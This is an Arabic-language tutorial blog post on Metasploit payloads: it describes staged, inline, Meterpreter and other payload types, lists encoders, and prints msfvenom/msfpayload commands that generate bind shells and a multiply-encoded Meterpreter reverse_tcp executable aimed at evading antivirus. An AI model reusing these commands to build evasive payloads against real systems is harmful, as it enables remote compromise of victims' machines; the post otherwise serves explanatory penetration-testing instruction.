Mohamed Elsayed

ع ناصية | مطور ويب متخصص في بلوجر واقدم هنا خلاصة تجربتي في التعلم

السلام عليكم ورحمه الله 
متابعى موقع   : تقنى بلس | اهلا بكم 


درس اليوم 

انواع واشكال واقوى البايلودات وماهى ومن اين ؟ 


أنواعها 





Inline (Non Staged


  • A single payload containing the exploit and full s h e ll code for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all in one. However some exploits wont support the resulting size of these payloads.

_____________________

Staged



  • Stager payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

______________________

Meterpreter


  • Meterpreter, the short form of M e t a -Interpreter is an advanced, multi-faceted payload that operates via dll injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required and Meterpreter development is very strong and constantly evolving.

____________________

PassiveX



  • PassiveX is a payload that can help in circumventing restrictive outbound firewalls. It does this by using an ActiveX control to create a hidden instance of Internet Explorer. Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses.

____________________

NoNX


  • The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP). The M e t a sploit NoNX payloads are designed to circumvent DEP.

______________________

Ord


  • Ordinal payloads are Windows stager based payloads that have distinct advantages and disadvantages. The advantages being it works on every flavor and language of Windows dating back to Windows 9x without the explicit definition of a return address. They are also extremely tiny. However two very specific disadvantages make them not the default choice. The first being that it relies on the fact that ws2_32.dll is loaded in the process being exploited before exploitation. The second being that it's a bit less stable than the other stagers.

___________________

IPv6


  • The M e t a sploit IPv6 payloads, as the name indicates, are built to function over IPv6 networks.

___________________

Reflective DLL injection



  • Reflective DLL Injection is a technique whereby a stage payload is injected into a compromised host process running in memory, never touching the host hard drive. The VNC and Meterpreter payloads both make use of reflective DLL injection. You can read more about this from Stephen Fewer, the creator of the reflective DLL injection method.
________________


أشكالها 

aix



bsd


bsdi


cmd


generic


java


linux


netware


osx


php


solaris


tty


windows

_________________


و لصنعها تقدر بطرق كثيرة 

مثل 

Msfvenom

مثل 

كود:
[COLOR=#339966][COLOR=Black]msfvenom[/COLOR] -p [COLOR=Red]windows/s h e ll/bind_tcp[/COLOR] -e x86/shikata_ga_nai -b '\x00' -i 3   [/COLOR]

او 
Msfconsole

مثل 

كود:
msf payload([COLOR=#ff0000]s h e ll_bind_tcp[/COLOR]) > [COLOR=#13C16A]generate[/COLOR]
كود:
msf  payload([COLOR=#ff0000]s h e ll_bind_tcp[/COLOR]) > [COLOR=#13C16A]generate -b '\x00'[/COLOR]
كود:
msf  payload([COLOR=#ff0000]s h e ll_bind_tcp[/COLOR]) > [COLOR=#13C16A]generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b'[/COLOR]


او

Msfpayload

مثل

كود:
[COLOR=#13C16A][COLOR=Black]msfpayload[/COLOR] [COLOR=Red]windows/s h e ll_bind_tcp[/COLOR] EXITFUNC=seh LPORT=1234 C[/COLOR]
و التخطي انواع

مثل

https 

http

________________

للتشفر طرق كثيرةاولاً نبدأ بالتشفير بــM e t a sploit 

encodes

أنواعها 


cmd/generic_sh 
cmd/ifs
cmd/printf_php_mq
generic/none
mipsbe/longxor
mipsle/longxor
php/base64
ppc/longxor
ppc/longxor_tag
sparc/longxor_tag
x64/xor
x86/alpha_mixed
x86/alpha_upper
x86/avoid_underscore_tolower
x86/avoid_utf8_tolower
x86/call4_dword_xor
x86/context_cpuid
x86/context_stat
x86/context_time
x86/countdown
x86/fnstenv_mov
x86/jmp_call_additive
x86/nonalpha
x86/nonupper
x86/shikata_ga_nai
x86/single_static_bit
x86/unicode_mixed
x86/unicode_upper




_______________


و تختلف على حسب قوتها و نوع البايلود المراد تشفيرة 


التشفير بــencode

encode ليس برنامج تشفير

هو يغير القيم في البايلود 

تحتاج الى شفرة خاصه فيك


اديك 
مثل 

مرات التشفير
encodes antivirs




AhnLab-V3 cmd/generic_sh 1
AntiVir cmd/ifs 
Antiy-AVL cmd/printf_php_mq 10
Avast generic/none 25
Avast7 mipsbe/longxor 100
AVG mipsle/longxor

هذي شفرة قديمة كنت استخدمهالدمج التشفير

مثلا 

كود:
msfpayload [COLOR=Red]windows/meterpreter/reverse_tcp[/COLOR] [COLOR=Green]LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5-t  raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e  x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe  -o /root/payload3.exe[/COLOR] 


و تقدر تشفر بطرق أخرى
مثل Hex هندسة عكسيةو الباك دور و s h e ll codeليس لــ M e t a sploit فقط




اهلاً و مرحباً بك في موقعنا
ادعمنا بالأشتراك في القناة وانضم الينا